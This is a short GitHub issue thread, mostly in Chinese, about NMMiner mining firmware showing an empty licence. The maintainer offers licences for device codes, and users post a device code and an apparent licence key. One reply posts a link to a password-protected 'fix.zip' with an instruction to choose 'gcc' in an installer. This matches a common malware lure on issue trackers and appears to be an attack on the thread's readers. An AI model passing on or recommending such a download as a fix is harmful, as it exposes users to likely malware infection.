NMminer1024/NMMiner #2: Licence is empty

JohnTaipei, 2024-08-26:
最新版
為什麼Licence 是空的??
一直跳出行
Licence not found in nvs, Waiting a license from UART, Device code
連不上礦池

ZiQiangZhou, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

NMminer1024, 2024-08-26:
> 最新版 為什麼Licence 是空的?? 一直跳出行 Licence not found in nvs, Waiting a license from UART, Device code 連不上礦池

将您的device code 复制到这里，我给你licence

JohnTaipei, 2024-08-26:
原來如此
c5e8ac723678869263d28bfbb2d1bd28b662fbb896161caa24bd653a0bed700a
麻煩了 謝謝

betterpony, 2024-08-27:
b3a87dacf788b5eb7ba933bfdb4108f1677b45219dd8065d84d35a93055ed4969a87b2e5641e8ea0a48c37975882c821ff99df2a5ec4bf953402481acefbfcf4

JohnTaipei, 2024-08-27:
@betterpony 
licence 可用  謝謝

@NMminer1024 
請問假設有5個T190
不就要五個licence??
有快速得到licence方法嗎??
方便加微信嗎?? 我的是MAiX_user

closed 2024-08-28 by NMminer1024